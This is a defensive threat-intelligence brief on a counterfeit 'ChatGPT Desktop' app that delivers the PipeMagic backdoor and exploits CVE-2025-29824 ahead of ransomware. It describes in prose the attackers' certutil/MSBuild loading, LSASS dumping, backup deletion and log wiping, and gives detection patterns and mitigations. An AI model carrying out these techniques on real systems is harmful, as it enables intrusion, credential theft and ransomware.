Breaking Brief
-
A counterfeit “ChatGPT Desktop” app is delivering PipeMagic, a modular backdoor used by the financially motivated group Storm‑2460; the campaign chains a Windows CLFS zero‑day (CVE‑2025‑29824) for privilege escalation and culminates in ransomware deployment. Victims span IT, finance, and real estate across the U.S., Europe, South America, and the Middle East.microsoft+1
-
Delivery uses compromised legitimate sites, certutil‑based downloads, and malicious MSBuild projects to reflectively load PipeMagic in memory before exploiting CLFS to elevate privileges, delete backups, and prepare encryption.logpoint+1
Technical Deep Dive
-
Loader and disguise: Attackers fork a legitimate open‑source ChatGPT desktop project, injecting code to decrypt and run an in‑memory dropper that launches PipeMagic without obvious UI (blank‑app decoy variants seen since 2024).securityaffairs+1
-
Backdoor architecture: PipeMagic communicates over TCP to C2, then loads additional modules through encrypted named pipes, organizing them with in‑memory doubly linked lists for staging, execution, and comms—minimizing on‑disk artifacts.thehackernews+1
-
Exploit chain: certutil fetches a malicious MSBuild file from a compromised site; the file decrypts a payload via callback tricks (e.g., EnumCalendarInfoA), starts PipeMagic, then triggers CLFS EoP (CVE‑2025‑29824) ahead of ransomware launch.logpoint+1
-
Post‑EoP actions: LSASS dumping, backup deletion (wbadmin), BCD tampering to disable recovery, and log wiping (wevtutil), indicating a playbook for high‑impact encryption at scale.logpoint
AI‑Themed Social Engineering Trends
-
Brand abuse: Fake AI apps (ChatGPT desktop clients) serve as high‑trust lures; projects are cloned from GitHub and malvertised, with installers trojanized to drop loaders/backdoors.securityaffairs+1
-
ClickFix‑style flows: Users are steered via malvertising or compromised sites to “fix” prompts that silently load malicious installers—aligning with recent social engineering patterns.intruceptlabs+1
Detection Guide
-
Endpoint telemetry
-
Flag certutil network calls pulling MSBuild projects from unusual domains; correlate with msbuild.exe launching without a developer workflow.microsoft+1
-
Hunt for creation/use of random named pipes matching \.\pipe\1.<hex> patterns, followed by outbound TCP sessions to rare hosts.thehackernews
-
Detect BCD edits, wbadmin backup deletions, and wevtutil log clears within the same session—classic ransomware prep sequence.logpoint
-
-
Network/SWG
-
Block newly observed domains hosting “ChatGPT desktop” installers; inspect MSBuild payload downloads from compromised legitimate sites.intruceptlabs+1
-
Alert on anomalous TCP C2 beacons from endpoints that recently executed ChatGPT‑themed installers.thehackernews
-
Windows Hardening and Immediate Mitigations
-
Patch CLFS: Ensure April 2025 (and later) updates that fix CVE‑2025‑29824 are deployed on all Windows endpoints; prioritize admin workstations and servers.microsoft+1
-
Constrain LOLBINs: Block or restrict certutil and MSBuild on non‑developer machines via AppLocker/WDAC; enable ASR rules for Office/Mscript abuse and block process creations from PSExec/WMI if not required.logpoint
-
EDR controls: Turn on memory scanning and named‑pipe monitoring; add detections for EnumCalendarInfoA‑based loaders and reflective PE injection patterns.thehackernews+1
-
Software allowlisting: Only permit signed and verified installers; require code‑signed updates for any “ChatGPT desktop” tool; prefer official store or vendor channels.securityaffairs
ChatGPT App Verification Guide (for users)
-
Source of truth: Download only from the official publisher site or verified app stores; avoid “free enhanced ChatGPT desktop” links from ads or forums.securityaffairs
-
Signature check: Verify digital signature and publisher; hash‑check installers and compare to known‑good releases.securityaffairs
-
Behavior red flags: Blank UI, unexpected admin prompts, or background network activity during idle are indicators to quarantine and report.securityaffairs
Incident Response Procedures
-
Contain: Isolate affected hosts; block egress to suspicious C2; preserve volatile memory to capture in‑memory modules and named‑pipe indicators.logpoint+1
-
Eradicate: Remove persistence, rotate credentials, and reimage if LSASS dumping or backup deletions are confirmed; restore from known‑good backups after validating BCD and event log integrity.logpoint
-
Recover and monitor: Re‑enable recovery options, validate backups, and deploy detections for PipeMagic pipe naming and MSBuild reflective loaders across the fleet.thehackernews+1